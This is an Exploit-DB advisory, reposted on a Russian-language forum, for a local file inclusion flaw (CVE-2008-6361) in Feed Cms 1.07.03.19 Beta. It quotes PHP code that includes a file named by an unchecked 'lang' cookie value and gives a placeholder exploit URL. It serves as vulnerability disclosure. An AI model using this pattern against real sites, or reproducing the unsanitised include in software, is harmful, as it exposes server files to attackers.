- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7422
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6361
- Дата публикации
- 2008-12-11
Код:
###############################
Feed Cms 1.07.03.19 Beta LFI
###############################
Autore: x0r
Email: [email protected]
Download:
http://heanet.dl.sourceforge.net/sourceforge/feedcms/FeedCms1.07.03.19Beta.rar
###############################
Bug In: index.php
if ($_GET['lang'])
{
$language = $_GET['lang'];
setcookie('firstlang',$language,time()+3600*240*365);
header('location:'.$redirect);
}
$lang = $_COOKIE['firstlang'] ? $_COOKIE['firstlang'] : $lang;
include_once($FeedCms_Dir."lang/$lang/$lang.php");
LFI By Cookie ^ ^
Exploit:
http://[site]/FeedCms/?lang=[LFI] ^ ^
Greetz: A Te Che Mi Hai Cambiato La Vita...
# milw0rm.com [2008-12-11]- Источник
- www.exploit-db.com
